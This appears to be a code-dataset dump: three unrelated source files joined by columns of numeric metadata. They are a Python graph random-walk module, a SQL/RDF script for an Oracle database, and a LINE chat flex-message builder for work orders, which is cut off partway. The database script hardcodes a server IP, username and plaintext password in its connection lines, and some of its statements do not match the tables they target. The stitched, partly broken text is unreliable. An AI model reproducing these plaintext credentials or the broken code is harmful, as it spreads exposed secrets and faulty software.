            dexPer0_all[i] = dexPer0
            dexPer1_all[i] = dexPer1
            i += 1
    return dexPer0_all, dexPer1_all
def dexPer_of_all_vertices_sample(Graph, k_ring, sample_rate):
    """Compute dexPer for ceil(N * sample_rate) randomly drawn nodes
    (snap RNG seeded with 42, then randomized)."""
    rng = snap.TRnd(42)
    rng.Randomize()
    count = int(np.ceil(Graph.GetNodes() * sample_rate))
    pairs = [pick_node_compute_dexPer(Graph, k_ring, Graph.GetRndNId(rng))
             for _ in range(count)]
    return [p[0] for p in pairs], [p[1] for p in pairs]
def RW_dexPer_of_all_vertices(Graph, num_steps, rate, max_num_walks_per_node=np.inf):
    """Compute random-walk dexPer for every node of Graph, in
    node-iteration order.

    BUG FIX: the original called pick_node_compute_RW_dexPer without its
    mandatory max_num_walks_per_node argument, raising TypeError on every
    call.  The new keyword default (np.inf, i.e. no cap) preserves the
    apparent intent and keeps the signature backward-compatible.
    """
    dexPer0_all = []
    dexPer1_all = []
    for NI in Graph.Nodes():
        dexPer0, dexPer1 = pick_node_compute_RW_dexPer(
            Graph, num_steps, rate, NI.GetId(), max_num_walks_per_node)
        dexPer0_all.append(dexPer0)
        dexPer1_all.append(dexPer1)
    return dexPer0_all, dexPer1_all
def RW_dexPer_of_all_vertices_in_kring(Graph, num_steps, rate, k_ring):
    """Compute k-ring-restricted random-walk dexPer for every node of Graph,
    in node-iteration order."""
    d0_all = []
    d1_all = []
    for NI in Graph.Nodes():
        d0, d1 = pick_node_compute_RW_dexPer_in_kring(Graph, num_steps, rate, k_ring, NI.GetId())
        d0_all.append(d0)
        d1_all.append(d1)
    return d0_all, d1_all
def RW_dexPer_of_all_vertices_steps(Graph, num_steps):
    """Compute fixed-step random-walk dexPer for every node of Graph, in
    node-iteration order."""
    d0_all = []
    d1_all = []
    for NI in Graph.Nodes():
        d0, d1 = pick_node_compute_RW_dexPer_steps(Graph, num_steps, NI.GetId())
        d0_all.append(d0)
        d1_all.append(d1)
    return d0_all, d1_all
def RW_dexPer_of_all_vertices_steps_flyback(Graph, num_steps, flyback_prob=0.15):
    """Compute flyback random-walk dexPer for every node of Graph, in
    node-iteration order."""
    d0_all = []
    d1_all = []
    for NI in Graph.Nodes():
        d0, d1 = pick_node_compute_RW_dexPer_steps_flyback(
            Graph, num_steps, NI.GetId(), flyback_prob=flyback_prob)
        d0_all.append(d0)
        d1_all.append(d1)
    return d0_all, d1_all
def RW_dexPer_of_all_vertices_in_kring_sample(Graph, num_steps, rate, k_ring, sample_rate):
    """Compute k-ring random-walk dexPer for ceil(N * sample_rate) randomly
    drawn nodes (snap RNG seeded with 42, then randomized)."""
    rng = snap.TRnd(42)
    rng.Randomize()
    count = int(np.ceil(Graph.GetNodes() * sample_rate))
    pairs = [pick_node_compute_RW_dexPer_in_kring(Graph, num_steps, rate, k_ring, Graph.GetRndNId(rng))
             for _ in range(count)]
    return [p[0] for p in pairs], [p[1] for p in pairs]
def RW_dexPer_of_all_vertices_in_kring_fixed_samplesize(Graph, num_steps, rate, k_ring, sample_size):
    """Compute k-ring random-walk dexPer for exactly sample_size randomly
    drawn nodes (snap RNG seeded with 42, then randomized)."""
    rng = snap.TRnd(42)
    rng.Randomize()
    pairs = [pick_node_compute_RW_dexPer_in_kring(Graph, num_steps, rate, k_ring, Graph.GetRndNId(rng))
             for _ in range(sample_size)]
    return [p[0] for p in pairs], [p[1] for p in pairs]
def RW_dexPer_of_all_vertices_steps_sample(Graph, num_steps, sample_rate):
    """Compute fixed-step random-walk dexPer for ceil(N * sample_rate)
    randomly drawn nodes (snap RNG seeded with 42, then randomized)."""
    rng = snap.TRnd(42)
    rng.Randomize()
    count = int(np.ceil(Graph.GetNodes() * sample_rate))
    pairs = [pick_node_compute_RW_dexPer_steps(Graph, num_steps, Graph.GetRndNId(rng))
             for _ in range(count)]
    return [p[0] for p in pairs], [p[1] for p in pairs]
def RW_dexPer_of_all_vertices_steps_fixed_samplesize(Graph, num_steps, sample_size):
    """Compute fixed-step random-walk dexPer for exactly sample_size randomly
    drawn nodes (snap RNG seeded with 42, then randomized)."""
    rng = snap.TRnd(42)
    rng.Randomize()
    pairs = [pick_node_compute_RW_dexPer_steps(Graph, num_steps, Graph.GetRndNId(rng))
             for _ in range(sample_size)]
    return [p[0] for p in pairs], [p[1] for p in pairs]
def RW_dexPer_of_all_vertices_steps_fixed_samplesize_flyback(Graph, num_steps, sample_size, flyback_prob):
    """Compute flyback random-walk dexPer for exactly sample_size randomly
    drawn nodes (snap RNG seeded with 42, then randomized)."""
    rng = snap.TRnd(42)
    rng.Randomize()
    pairs = [pick_node_compute_RW_dexPer_steps_flyback(
                 Graph, num_steps, Graph.GetRndNId(rng), flyback_prob=flyback_prob)
             for _ in range(sample_size)]
    return [p[0] for p in pairs], [p[1] for p in pairs]
def dexPer_of_all_vertices_fixed_samplesize(Graph, k_ring, sample_size):
    """Compute k-ring dexPer for exactly sample_size randomly drawn nodes
    (snap RNG seeded with 42, then randomized)."""
    rng = snap.TRnd(42)
    rng.Randomize()
    pairs = [pick_node_compute_dexPer(Graph, k_ring, Graph.GetRndNId(rng))
             for _ in range(sample_size)]
    return [p[0] for p in pairs], [p[1] for p in pairs]
def RW_dexPer_of_all_vertices_steps_sample_node_rate(Graph, num_steps, sample_rate, node_rate, max_num_walks_per_node):
    """Compute random-walk dexPer (per-node rate node_rate, capped walks) for
    ceil(N * sample_rate) randomly drawn nodes (snap RNG seeded with 42,
    then randomized)."""
    rng = snap.TRnd(42)
    rng.Randomize()
    count = int(np.ceil(Graph.GetNodes() * sample_rate))
    pairs = [pick_node_compute_RW_dexPer(
                 Graph, num_steps, node_rate, Graph.GetRndNId(rng), max_num_walks_per_node)
             for _ in range(count)]
    return [p[0] for p in pairs], [p[1] for p in pairs]
def RW_dexPer_of_all_vertices_steps_fixed_samplesize_node_rate(Graph, num_steps, sample_size, node_rate, max_num_walks_per_node):
    """Compute random-walk dexPer (per-node rate node_rate, capped walks) for
    exactly sample_size randomly drawn nodes (snap RNG seeded with 42,
    then randomized)."""
    rng = snap.TRnd(42)
    rng.Randomize()
    pairs = [pick_node_compute_RW_dexPer(
                 Graph, num_steps, node_rate, Graph.GetRndNId(rng), max_num_walks_per_node)
             for _ in range(sample_size)]
    return [p[0] for p in pairs], [p[1] for p in pairs]
def output_dexPer_of_a_vertex(Graph, k_ring, D0_output, D1_output, NId):
    """Compute dexPer for node NId and append one "<NId> \\t <dict>" line to
    each of the files D0_output (dexPer0) and D1_output (dexPer1).

    BUG FIX: the original opened both files up front and closed them
    manually, so a failed write leaked the handles; `with` guarantees each
    file is closed even if the write raises.
    """
    dexPer0, dexPer1 = pick_node_compute_dexPer(Graph, k_ring, NId)
    with open(D0_output, 'a') as d0_file:
        d0_file.write("%d \t %s\n" % (NId, dexPer0))
    with open(D1_output, 'a') as d1_file:
        d1_file.write("%d \t %s\n" % (NId, dexPer1))
def dexPer_of_all_vertices_parallel(filename, k_ring):
    """Compute dexPer for all vertices of the graph in filename using 8
    worker processes.

    Each worker re-loads the graph from filename (the path, not the graph,
    is what gets pickled to the workers).  Returns (list of dexPer0, list of
    dexPer1) in node-iteration order.

    IMPROVEMENT: the pool is now managed with `with`, so workers are cleaned
    up even if map() raises (the original's close/join was skipped on error).
    """
    Graph = snap.LoadEdgeList(snap.PUNGraph, filename, 0, 1, '\t')
    Nodes = [NI.GetId() for NI in Graph.Nodes()]
    func = partial(dexPer_of_a_vertex, filename, k_ring)
    with Pool(8) as pool:
        dexPer_all = pool.map(func, Nodes)
    return [item[0] for item in dexPer_all], [item[1] for item in dexPer_all]
def RW_dexPer_of_all_vertices_parallel(filename, num_steps, rate):
    """Compute random-walk dexPer for all vertices of the graph in filename
    using 8 worker processes (each worker re-loads the graph from the path).

    IMPROVEMENT: the pool is now managed with `with`, so workers are cleaned
    up even if map() raises (the original's close/join was skipped on error).
    """
    Graph = snap.LoadEdgeList(snap.PUNGraph, filename, 0, 1, '\t')
    Nodes = [NI.GetId() for NI in Graph.Nodes()]
    func = partial(RW_dexPer_of_a_vertex, filename, num_steps, rate)
    with Pool(8) as pool:
        dexPer_all = pool.map(func, Nodes)
    return [item[0] for item in dexPer_all], [item[1] for item in dexPer_all]
def RW_dexPer_of_all_vertices_in_kring_parallel(filename, num_steps, rate, k_ring):
    """Compute k-ring random-walk dexPer for all vertices of the graph in
    filename using 8 worker processes (each worker re-loads the graph).

    IMPROVEMENT: the pool is now managed with `with`, so workers are cleaned
    up even if map() raises (the original's close/join was skipped on error).
    """
    Graph = snap.LoadEdgeList(snap.PUNGraph, filename, 0, 1, '\t')
    Nodes = [NI.GetId() for NI in Graph.Nodes()]
    func = partial(RW_dexPer_of_a_vertex_in_kring, filename, num_steps, rate, k_ring)
    with Pool(8) as pool:
        dexPer_all = pool.map(func, Nodes)
    return [item[0] for item in dexPer_all], [item[1] for item in dexPer_all]
def RW_dexPer_of_all_vertices_steps_parallel(filename, num_steps):
    """Compute fixed-step random-walk dexPer for all vertices of the graph in
    filename using 8 worker processes (each worker re-loads the graph).

    IMPROVEMENT: the pool is now managed with `with`, so workers are cleaned
    up even if map() raises (the original's close/join was skipped on error).
    """
    Graph = snap.LoadEdgeList(snap.PUNGraph, filename, 0, 1, '\t')
    Nodes = [NI.GetId() for NI in Graph.Nodes()]
    func = partial(RW_dexPer_of_a_vertex_steps, filename, num_steps)
    with Pool(8) as pool:
        dexPer_all = pool.map(func, Nodes)
    return [item[0] for item in dexPer_all], [item[1] for item in dexPer_all]
| 36.26747
| 135
| 0.572553
| 3,660
| 30,102
| 4.410383
| 0.045082
| 0.048321
| 0.027878
| 0.029984
| 0.956015
| 0.939351
| 0.917173
| 0.898959
| 0.888304
| 0.87071
| 0
| 0.020742
| 0.271278
| 30,102
| 829
| 136
| 36.311218
| 0.715126
| 0.015115
| 0
| 0.875399
| 0
| 0
| 0.001441
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055911
| false
| 0
| 0.011182
| 0
| 0.132588
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7351006eeecd2d5905c7afc937fbaf53aa95984f
| 7,556
|
py
|
Python
|
tests/FIBO1.py
|
nelmiux/CS347-Data_Management
|
1e9d87097b5a373f9312b0d6b413198e495fd6c0
|
[
"CNRI-Jython"
] | null | null | null |
tests/FIBO1.py
|
nelmiux/CS347-Data_Management
|
1e9d87097b5a373f9312b0d6b413198e495fd6c0
|
[
"CNRI-Jython"
] | null | null | null |
tests/FIBO1.py
|
nelmiux/CS347-Data_Management
|
1e9d87097b5a373f9312b0d6b413198e495fd6c0
|
[
"CNRI-Jython"
] | null | null | null |
conn = connectTo 'jdbc:oracle:thin:@128.83.138.158:1521:orcl' 'C##cs347_prof' 'orcl_prof' 'rdf_mode' 'FIBO1';
conn1 = connectTo 'jdbc:oracle:thin:@128.83.138.158:1521:orcl' 'C##cs347_prof' 'orcl_prof' 'native_mode' 'FIBO1';
SQL on conn """ create table Thing(thing_id integer, name varchar(255)) """
SQL on conn """ create table EquityOwner(equity_owner_id integer, name varchar(255)) """
SQL on conn """ create table Role(role_id integer, name varchar(255)) """
SQL on conn """ create table Equity(equity_id integer, name varchar(255)) """
SQL on conn """ create table StockholderEquity(sh_equity_id integer, name varchar(255)) """
SQL on conn """ create table FormallyConstitutedOrganizaiton(fco_id integer, name varchar(255)) """
SQL on conn """ create table BodyCorporation(bc_id integer, name varchar(255)) """
SQL on conn """ create table BodyCorporationWithEquity(bcwe_id integer, name varchar(255)) """
SQL on conn """ create table IncorporatedCompany(ic_id integer, name varchar(255)) """
SQL on conn1 """ INSERT INTO FIBO1_C##CS347_PROF_DATA VALUES ( FIBO1_C##CS347_PROF_SQNC.nextval, SDO_RDF_TRIPLE_S('FIBO1_C##CS347_PROF:<http://www.example.org/people.owl>', 'http://www.example.org/people.owl#BodyCorporation', 'http://www.w3.org/2000/01/rdf-schema#subClassOf', 'http://www.example.org/people.owl#FormallyConstitutedOrganizaiton')); """
SQL on conn1 """ INSERT INTO FIBO1_C##CS347_PROF_DATA VALUES ( FIBO1_C##CS347_PROF_SQNC.nextval, SDO_RDF_TRIPLE_S('FIBO1_C##CS347_PROF:<http://www.example.org/people.owl>', 'http://www.example.org/people.owl#BodyCorporationWithEquity', 'http://www.w3.org/2000/01/rdf-schema#subClassOf', 'http://www.example.org/people.owl#BodyCorporation')); """
SQL on conn1 """ INSERT INTO FIBO1_C##CS347_PROF_DATA VALUES ( FIBO1_C##CS347_PROF_SQNC.nextval, SDO_RDF_TRIPLE_S('FIBO1_C##CS347_PROF:<http://www.example.org/people.owl>', 'http://www.example.org/people.owl#IncorporatedCompany', 'http://www.w3.org/2000/01/rdf-schema#subClassOf', 'http://www.example.org/people.owl#BodyCorporationWithEquity')); """
SQL on conn """ create table fibo_be_oac_cown_02(fibo2_id integer, name varchar(255)) """
SQL on conn """ create table ConstitutionalOwner(co_id integer) """
SQL on conn """ create table TransferableContractHolder(tch_id integer, name varchar(255)) """
SQL on conn """ create table Shareholder(shareholder_id integer, name varchar(255)) """
SQL on conn """ create table PublicShareholder(psh_id integer, name varchar(255)) """
SQL on conn """ create table RegisteredShareholder(rsh_id integer, name varchar(255)) """
SQL on conn """ create table BeneficialOwner(bo_id integer, name varchar(255)) """
SQL on conn """ create table fibo_be_oac_cown_01(fibo1_id integer, name varchar(255)) """
SQL on conn """ create table FinancialAsset(fa_id integer, name varchar(255)) """
SQL on conn """ create table Sharholding(shing_id integer, name varchar(255)) """
SQL on conn """ create table Zipcode(zipcode_id integer, name varchar(255)) """
SQL on conn """ insert into FormallyConstitutedOrganizaiton(zipcode) values (rel_zipcode) """
SQL on conn """ insert into Zipcode(zipcode) values (rel_zipcode) """
connr = connectTo 'jdbc:oracle:thin:@128.83.138.158:1521:orcl' 'C##cs347_prof' 'orcl_prof' 'rdf_mode' 'FIBOR';
SQL on connr """ insert into BodyCorporation(x, zip_code) values (1, 78733) """
SQL on conn1 """ INSERT INTO FIBOR_C##CS347_PROF_DATA VALUES ( FIBOR_C##CS347_PROF_SQNC.nextval, SDO_RDF_TRIPLE_S('FIBOR_C##CS347_PROF:<http://www.example.org/people.owl>', 'http://www.example.org/people.owl#zip_code', 'rdf:type', 'owl:DatatypeProperty')) """
SQL on conn1 """ INSERT INTO FIBOR_C##CS347_PROF_DATA VALUES ( FIBOR_C##CS347_PROF_SQNC.nextval, SDO_RDF_TRIPLE_S('FIBOR_C##CS347_PROF:<http://www.example.org/people.owl>', 'http://www.example.org/people.owl#zip_code', 'rdfs:domain', 'http://www.example.org/people.owl#BodyCorporation')) """
SQL on conn1 """ INSERT INTO FIBOR_C##CS347_PROF_DATA VALUES ( FIBOR_C##CS347_PROF_SQNC.nextval, SDO_RDF_TRIPLE_S('FIBOR_C##CS347_PROF:<http://www.example.org/people.owl>', 'http://www.example.org/people.owl#zip_code', 'rdf:range', 'rdfs:xsd:integer')) """
SQL on conn1 """ INSERT INTO FIBOR_C##CS347_PROF_DATA VALUES ( FIBOR_C##CS347_PROF_SQNC.nextval, SDO_RDF_TRIPLE_S('FIBOR_C##CS347_PROF:<http://www.example.org/people.owl>', 'http://www.example.org/people.owl#zip_code', 'rdf:type', 'owl:FunctionalProperty')) """
'''
SQL on connr """ insert into BodyCorporation(x, zip_code) values (2, 78734) """
SQL on connr """ insert into BodyCorporation(x, zip_code) values (3, 78735) """
SQL on connr """ insert into BodyCorporation(x, zip_code) values (4, 78736) """
SQL on connr """ insert into BodyCorporation(x, zip_code) values (5, 78737) """
SQL on connr """ insert into BodyCorporationWithEquity(x, zip_code) values (1, 78733) """
SQL on connr """ insert into BodyCorporationWithEquity(x, zip_code) values (2, 78734) """
SQL on connr """ insert into BodyCorporationWithEquity(x, zip_code) values (3, 78735) """
SQL on connr """ insert into BodyCorporationWithEquity(x, zip_code) values (4, 78736) """
SQL on connr """ insert into BodyCorporationWithEquity(x, zip_code) values (5, 78737) """
SQL on connr """ insert into IncorporatedCompany(x, zip_code) values (1, 78733) """
SQL on connr """ insert into IncorporatedCompany(x, zip_code) values (2, 78734) """
SQL on connr """ insert into IncorporatedCompany(x, zip_code) values (3, 78735) """
SQL on connr """ insert into IncorporatedCompany(x, zip_code) values (4, 78736) """
SQL on connr """ insert into IncorporatedCompany(x, zip_code) values (5, 78737) """
SQL on connr """ insert into PublicShareholder(y, zip_code) values (4, 78733) """
SQL on connr """ insert into PublicShareholder(y, zip_code) values (8, 78734) """
SQL on connr """ insert into PublicShareholder(y, zip_code) values (12, 78735) """
SQL on connr """ insert into PublicShareholder(y, zip_code) values (16, 78736) """
SQL on connr """ insert into PublicShareholder(y, zip_code) values (20, 78737) """
'''
SQL on connr """ insert into Zipcode(y, zip_code) values (4, 78733) """
SQL on connr """ insert into Zipcode(y, zip_code) values (8, 78734) """
SQL on connr """ insert into Zipcode(y, zip_code) values (12, 78735) """
SQL on connr """ insert into Zipcode(y, zip_code) values (16, 78736) """
SQL on connr """ insert into Zipcode(y, zip_code) values (20, 78737) """
r1 = SQL on connr """ select * from BodyCorporation """
r2 = SQL on connr """ select * from PublicShareholder """
r3 = SQL on connr """ select * from Zipcode """
r4 = SQL on connr """ select x, y from BodyCorporation f join Zipcode z on (f.zip_code = z.zip_code) order by 1 """
print r1
print
print r2
print
print r3
print
print r4
"""
-- truncate table FIBO1_C##CS347_PROF_DATA; truncate table FIBOR_C##CS347_PROF_DATA
SELECT a.triple.GET_SUBJECT() as subject,
a.triple.GET_PROPERTY() as property,
a.triple.GET_OBJECT() as object
from FIBO1_C##CS347_PROF_DATA a order by subject, property;
select x, y from FormallyConstitutedOrganizaiton f join Zipcode z on (f.zipcode = z.zipcode) order by 1
df <- data.frame(fromJSON(getURL(URLencode(gsub("\n", " ", '129.152.144.84:5001/rest/native/?query=
"select x, y from FormallyConstitutedOrganizaiton f join Zipcode z on (f.zip_code = z.zip_code) order by 1"
')),httpheader=c(DB='jdbc:oracle:thin:@128.83.138.158:1521:orcl', USER='C##cs347_prof', PASS='orcl_prof', MODE='rdf_mode', MODEL='FIBOR', returnDimensions = 'False', returnFor = 'JSON'), verbose = TRUE))); tbl_df(df)
"""
| 74.078431
| 351
| 0.729884
| 1,148
| 7,556
| 4.658537
| 0.137631
| 0.054226
| 0.054226
| 0.074794
| 0.799551
| 0.764772
| 0.762154
| 0.745699
| 0.738594
| 0.723822
| 0
| 0.064434
| 0.114743
| 7,556
| 101
| 352
| 74.811881
| 0.735087
| 0
| 0
| 0.061224
| 0
| 0.163265
| 0.81454
| 0.195818
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.142857
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
73548a738e11e71b97efef608f631774220ef7bc
| 121,305
|
py
|
Python
|
app/createflexmessage.py
|
ThebiggunSeeoil/app-cbre-exxon
|
efec395dca662132a19f882b0ff3dbb6318b3e51
|
[
"MIT"
] | null | null | null |
app/createflexmessage.py
|
ThebiggunSeeoil/app-cbre-exxon
|
efec395dca662132a19f882b0ff3dbb6318b3e51
|
[
"MIT"
] | null | null | null |
app/createflexmessage.py
|
ThebiggunSeeoil/app-cbre-exxon
|
efec395dca662132a19f882b0ff3dbb6318b3e51
|
[
"MIT"
] | null | null | null |
import datetime
class creatinglinemessages ():
def summary_by_contractor(data,date_today,planned_date):
Main_data = {"type": "flex",
"altText": "Flex Message",
"contents":
{
"type": "carousel",
"contents":[{
"type": "bubble",
"size": "giga",
"hero": {
"type": "image",
"url": "https://seeoil-web.com/cbre/Picture/CBRE-Logo.jpg",
"align": "center",
"gravity": "bottom",
"size": "full",
"aspectRatio": "20:7",
"aspectMode": "cover",
"action": {
"type": "uri",
"label": "Line",
"uri": "https://linecorp.com/"
},
"position": "relative"
},
"body": {
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "text",
"text": "Summary Report All Contractor",
"weight": "bold",
"size": "sm",
"color": "#225508FF",
"align": "center",
"contents": []
},
{
"type": "text",
"text": str(date_today),
"weight": "bold",
"size": "sm",
"color": "#225508FF",
"align": "center",
"contents": []
},
{
"type": "text",
"text": "Planned on " + planned_date,
"weight": "bold",
"size": "sm",
"color": "#225508FF",
"align": "center",
"contents": []
},
{
"type": "separator",
"margin": "sm",
"color": "#165C3CFF"
},
{
"type": "box",
"layout": "baseline",
"spacing": "sm",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "SP",
"weight": "bold",
"size": "xs",
"contents": []
},
{
"type": "text",
"text": "WR",
"weight": "bold",
"size": "xs",
"align": "center",
"position": "relative",
"contents": []
},
{
"type": "text",
"text": "SB",
"weight": "bold",
"size": "xs",
"align": "center",
"contents": []
},
{
"type": "text",
"text": "PA",
"weight": "bold",
"size": "xs",
"align": "center",
"contents": []
},
{
"type": "text",
"text": "TD-PD",
"weight": "bold",
"size": "xs",
"align": "center",
"contents": []
}
]
},
{
"type": "separator",
"margin": "md",
"color": "#165C3CFF"
},
{
"type": "text",
"text": "SP : Providor Name , WR : Work received today",
"size": "xxs",
"align": "center",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": "SB : Submitted Work , PA : Work All Pending",
"size": "xxs",
"align": "center",
"margin": "xs",
"contents": []
},
{
"type": "text",
"text": "TD-PD : Work Planned "+planned_date,
"size": "xxs",
"align": "center",
"margin": "xs",
"contents": []
}
]
}
}
]
}}
for I in data :
name = I['name']
if 'new_work_today' not in I :
new_work_today = '0'
else :
new_work_today = I['new_work_today']
if 'today_submit' not in I :
today_submit = '0'
else :
today_submit = I['today_submit']
if 'todaypending' not in I :
todaypending = '0'
else :
todaypending = I['todaypending']
if 'planned_today' not in I :
planned_today = '0'
else :
planned_today = I['planned_today']
# print (name)
# print (new_work_today)
# print (today_submit)
# print (todaypending)
# print (planned_today)
content_data = {
"type": "box",
"layout": "baseline",
"contents": [
{
"type": "text",
"text": name,
"size": "xs",
"align": "start",
"contents": []
},
{
"type": "text",
"text": str(new_work_today),
"size": "xs",
"align": "center",
"position": "relative",
"contents": []
},
{
"type": "text",
"text": str(today_submit),
"size": "xs",
"align": "center",
"contents": []
},
{
"type": "text",
"text": str(todaypending),
"size": "xs",
"align": "center",
"contents": []
},
{
"type": "text",
"text": str(planned_today),
"size": "xs",
"align": "center",
"contents": []
}
]
}
Main_data['contents']['contents'][0]['body']['contents'].insert(-4,content_data)
return Main_data
def submit_notify(request):
planned_date=request.POST.get('planned_date')
caller=request.POST.get('caller')
job_description=request.POST.get('job_description')
workorder=request.POST.get('workorder')
company=request.POST.get('company')
fls_mame_1=request.POST.get('fls_mame_1')
fls_mame_2=request.POST.get('fls_mame_2')
data = {'\n'+'SUBMIT WAH TYPE'+'\n'
+'Contractor : ' + company + '\n'
+ 'SiteName : ' + caller + '\n'
+ 'WorkOrder '+ workorder + '\n'
+ 'WorkDetail : ' + job_description + '\n'
+ 'Planned : ' + planned_date + '\n'
+ 'fls_mame_1 : ' + fls_mame_1 + '\n'
+ 'fls_mame_2 : ' + fls_mame_2 }
return data
def updatedsubmit_notify(request):
planned_date=request.POST.get('planned_date')
caller=request.POST.get('caller')
job_description=request.POST.get('job_description')
workorder=request.POST.get('workorder')
company=request.POST.get('company')
fls_mame_1=request.POST.get('fls_mame')
data = {'\n'+'UPDATED DATE WAH'+'\n'
+'Contractor : ' + company + '\n'
+ 'SiteName : ' + caller + '\n'
+ 'WorkOrder '+ workorder + '\n'
+ 'WorkDetail : ' + job_description + '\n'
+ 'Planned : ' + planned_date + '\n'
+ 'fls_mame : ' + fls_mame_1 + '\n'
}
return data
def checkout_notify(data):
for I in data :
# Title = (I['Title'])
# print (I)
workorder = I.workorder
company= I.company
opended = I.opended
status = I.status
startwork = I.startwork
completedwork = I.completedwork
caller = I.caller
wah_status = I.wah_status
timestramp = I.timestramp
planned_date = I.planned_date
job_description = I.job_description
fls_mame = I.fls_mame_1
fls_startwork = I.fls_startwork
fls_completedwork = I.fls_completedwork
fls_phone = I.fls_phone
management = I.management
remark = I.remark
type_job = I.type_job
jla_ra = I.jla_ra
any_ssw = I.any_ssw
physical = I.physical
fm = I.fm
startwork=I.startwork
# print (workorder)
# print (company)
# print (opended)
# print (status)
# print (startwork)
# print (completedwork)
# print (caller)
# print (wah_status)
# print (timestramp)
# print (planned_date)
# print (job_description)
# print (fls_mame)
# print (fls_phone)
# print (management)
# print (remark)
# print (type_job)
# print (jla_ra)
# print (any_ssw)
# print (physical)
# print (fm)
data = {'\n'+'CHECKOUT WAH TYPE'+'\n'
+'Contractor : ' + company + '\n'
+ 'SiteName : ' + caller + '\n'
+ 'WorkOrder '+ workorder + '\n'
+ 'CheckIn Name : ' + fls_startwork + '\n'
+ 'CheckOut Name : ' + fls_completedwork + '\n'
+ 'CheckIn Time : ' + str(startwork) + '\n'
+ 'CheckOut Time : ' + str(completedwork)}
return data
def checkin_notify(data):
for I in data :
# Title = (I['Title'])
# print (I)
workorder = I.workorder
company= I.company
opended = I.opended
status = I.status
startwork = I.startwork
completedwork = I.completedwork
caller = I.caller
wah_status = I.wah_status
timestramp = I.timestramp
planned_date = I.planned_date
job_description = I.job_description
fls_mame = I.fls_mame_1
fls_startwork = I.fls_startwork
fls_phone = I.fls_phone
management = I.management
remark = I.remark
type_job = I.type_job
jla_ra = I.jla_ra
any_ssw = I.any_ssw
physical = I.physical
fm = I.fm
startwork=I.startwork
# print (workorder)
# print (company)
# print (opended)
# print (status)
# print (startwork)
# print (completedwork)
# print (caller)
# print (wah_status)
# print (timestramp)
# print (planned_date)
# print (job_description)
# print (fls_mame)
# print (fls_phone)
# print (management)
# print (remark)
# print (type_job)
# print (jla_ra)
# print (any_ssw)
# print (physical)
# print (fm)
data = {'\n'+'CHECKIN WAH TYPE'+'\n'
+'Contractor : ' + company + '\n'
+ 'SiteName : ' + caller + '\n'
+ 'WorkOrder '+ workorder + '\n'
+ 'CheckIn Name : ' + fls_startwork + '\n'
+ 'CheckIn Time : ' + str(startwork)}
return data
def wahsubmit (count_wah_submit_detail,type):
print ('insile createline')
if type == 'in planing' :
data = count_wah_submit_detail
arry_contants = []
data_wah = {"type": "flex",
"altText": "Flex Message",
"contents":
{
"type": "carousel",
"contents":
arry_contants
} }
for I in data :
# Title = (I['Title'])
print (I)
workorder = I.workorder
company= I.company
opended = I.opended
status = I.status
startwork = I.startwork
completedwork = I.completedwork
caller = I.caller
wah_status = I.wah_status
timestramp = I.timestramp
planned_date = I.planned_date.strftime("%d-%m-%Y %H:%M")
job_description = I.job_description
fls_mame = I.fls_mame_1
fls_phone = I.fls_phone
management = I.management
remark = I.remark
type_job = I.type_job
jla_ra = I.jla_ra
any_ssw = I.any_ssw
physical = I.physical
fm = I.fm
print (workorder)
print (company)
print (opended)
print (status)
print (startwork)
print (completedwork)
print (caller)
print (wah_status)
print (timestramp)
print (planned_date)
print (job_description)
print (fls_mame)
print (fls_phone)
print (management)
print (remark)
print (type_job)
print (jla_ra)
print (any_ssw)
print (physical)
print (fm)
contents_submit_wah = {
"type": "bubble",
"hero": {
"type": "image",
"url": "https://seeoil-web.com/cbre/Picture/CBRE-Logo.jpg",
"align": "center",
"gravity": "bottom",
"size": "full",
"aspectRatio": "20:7",
"aspectMode": "cover",
"action": {
"type": "uri",
"label": "Line",
"uri": "https://linecorp.com/"
},
"position": "relative"
},
"body": {
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "text",
"text": "WAH - DETAIL OF WORK",
"weight": "bold",
"size": "xl",
"color": "#225508FF",
"align": "center",
"contents": []
},
{
"type": "separator",
"margin": "xs",
"color": "#E42424FF"
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "Contractor :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": company,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "PlanedDate :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": str(planned_date),
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "WorkOrder :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": workorder,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "SiteName :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
"text": caller,
"size": "xxs",
"color": "#045221FF",
"align": "start",
"margin": "none",
"wrap": True,
"contents": []
}
]
},
{
"type": "box",
"layout": "horizontal",
"spacing": "none",
"margin": "xs",
"contents": [
{
"type": "text",
"text": "JobDescriptions :",
"weight": "bold",
"size": "xs",
"color": "#045221FF",
"margin": "sm",
"contents": []
},
{
"type": "text",
